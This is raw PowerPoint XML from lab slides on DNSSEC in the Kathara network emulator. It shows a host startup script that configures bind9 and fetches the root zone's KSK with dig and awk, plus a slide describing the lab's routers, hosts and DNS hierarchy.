            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>p</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>c4.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37D29E4B-17A9-8BA6-6311-D9571A41E408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8577239" y="1691964"/>
            <a:ext cx="3470176" cy="1602929"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66225"/>
              <a:gd name="adj2" fmla="val 76399"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>queries the Root server (10.0.3.5) for its public keys. It specifically looks for the KSK (257) key which uses the ECDSA P-256 (13) algorithm.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EB8B7A5-3642-DD27-4F2A-668042C2E3BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8217099" y="4827497"/>
            <a:ext cx="3830316" cy="954831"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35930"/>
              <a:gd name="adj2" fmla="val -79950"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>once the key is found, it saves it in its entirety inside the RECORD variable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264643933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1E3A14-7744-9453-6DD3-86CA0C0FEB22}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A1D6BD-D438-AE2C-A3AB-D85155D08630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C199FD7-04E6-D996-4A5A-69030A88391E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6ABB07C-CA96-BE69-5B29-EC6899176E76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E90E18F8-731D-6326-78A9-C7050F7663C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609092" y="1217551"/>
            <a:ext cx="11199450" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A147334B-8757-1FFA-A12B-FAD3E3D90AF8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="693"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>...</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>echo 'trust-anchors {};' &gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 770 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    echo " Waiting for key from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> (10.0.3.5)..."</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    while ! dig @10.0.3.5 . DNSKEY | grep -q "257 3 13"; do</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        sleep 2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    RECORD=$(dig @10.0.3.5 . DNSKEY | grep "257 3 13" | head -n 1)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    F=$(echo $RECORD | awk '{print $5}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    P=$(echo $RECORD | awk '{print $6}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    A=$(echo $RECORD | awk '{print $7}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    K=$(echo $RECORD | awk '{$1=$2=$3=$4=$5=$6=$7=""; print $0}' | tr -d '[:space:]') </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C03B8763-68A7-1B70-A178-405E4CB06502}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>p</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>c4.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9ECBD1D-5E78-5518-8685-AA4053DBE67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="216361" y="5625054"/>
            <a:ext cx="3470176" cy="742088"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -21396"/>
              <a:gd name="adj2" fmla="val -87658"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>extract the actual cryptographic string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{980D280A-49CA-49EC-F46A-C079AD5D195D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6590180" y="4418845"/>
            <a:ext cx="3830316" cy="647027"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73754"/>
              <a:gd name="adj2" fmla="val 33843"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>These three lines use awk to "cut out" pieces of the DNS record</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24131101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7" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBD5E7CA-9C58-48AA-323F-707E13B95CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>content of the lab without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8198" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE7CF4D6-80FD-46D2-8790-7B9D18C6C768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>There are two routers, called r1 and r2, there are four hosts, called pc1, pc2, pc3 and pc4, and three DNS levels, called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsuni</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>they are connected via  three LANs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>we force their MAC addresses to be easily readable</a:t>
            </a:r>
          </a:p>
